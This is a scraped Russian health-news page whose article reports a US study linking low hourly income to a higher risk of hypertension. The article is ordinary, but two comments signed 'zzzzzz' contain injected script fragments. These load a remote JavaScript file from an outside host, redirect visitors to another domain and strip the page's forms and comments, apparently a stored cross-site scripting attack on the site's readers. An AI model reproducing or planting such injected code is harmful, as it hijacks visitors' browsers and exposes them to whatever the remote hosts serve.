Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сколько вы получаете напр...  >>  Сколько вы получаете напрямую влияет на ваше давление! Сколько надо получать, чтобы быть здоровым – ученые ответили на этот вопрос!
 
Обратная связь
 

Сколько вы получаете напрямую влияет на ваше давление! Сколько надо получать, чтобы быть здоровым – ученые ответили на этот вопрос!

Размер шрифта
22 апреля 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

«Не в деньгах счастье» – многие любят повторять эту поговорку, но большинство всё же не отказались бы от зарплаты побольше, не так ли?

Результаты одного из недавних американских исследований убедительно показывают, что тощий кошелек бьет не только по настроению и самолюбию, но и по здоровью.

«Мы были удивлены тем, что уровень зарплаты оказался столь мощным фактором риска в группах лиц, которые, вообще говоря, не склонны к артериальной гипертензии. Ведь эта болезнь, как известно, больше характерна для мужчин и для лиц пожилого возраста», – говорит Дж. Пол Лейх, профессор общественного здоровья в Университете Дэвиса. «Наши данные свидетельствуют о том, что женщины и молодые работники с наименьшим доходом должны регулярно проверяться, в том числе на предмет проблем с давлением».

Гипертензия значительно повышает риск развития ишемической болезни сердца и инсульта, которые являются основными причинами смертности и инвалидности.

В исследовании принимались во внимание зарплата и другие аспекты трудовой деятельности, а также состояние здоровья, в том числе – артериального давления. Ученые опирались на выборку из 10 000 человек в возрасте 25-65 лет в течение трех временных промежутков: 1999-2001, 2001-2003, 2003-2005. Лица, у которых развивалась гипертензия в первый год наблюдения, исключались из исследования.

Заработная плата рассчитывалась как ежегодный доход из всех источников, деленный на количество рабочих часов. Гипертензия фиксировалась на основании диагноза лечащих врачей каждого из участников.

Используя статистические методики, исследователи пришли к выводу, что удвоение материального дохода снижает риск развития артериальной гипертензии на 16% в целом, а еще больше – среди женщин и молодых работников: на 30-35% и 25-30% соответственно.

Половые различия в результатах исследования можно объяснить тем, что женщины, как правило, более ответственно подходят к своему здоровью, охотнее обращаются к врачу и поэтому у них чаще диагностируется артериальная гипертензия. «Однако многолетний характер нашего наблюдения за этими пациентами снижает влияние личностных особенностей на итоговый результат», – отмечает Лейх.

 

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 19:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:19

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Врет ли ваш тонометр? Ошибки, которые повышают показатели давления   Вам назначили новое лекарство. О чем спросить врача?   Что здоровее: кофе молотый и растворимый   3 теста, когда мерзнут ноги  
19 апреля 2013Сколько вы получаете напрямую влияет на ваше давление! Сколько надо получать, чтобы быть здоровым – ученые ответили на этот вопрос! 05 апреля 2013Вам скучно на работе? Это хорошо!
 
30 января 2012Измерение давления на обеих руках спасет жизнь 16 января 2012Опасные соединения помогают нормализовать давление
 

Слайдшоу

1
12 привычек, которые убивают ваше сердце
10 причин напиться
Тесты, которые должен сделать каждый мужчина. Часть 1

Тесты

Грозит ли вам инфаркт миокарда?
Проверьте свое зрение
Сколько вы проживете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.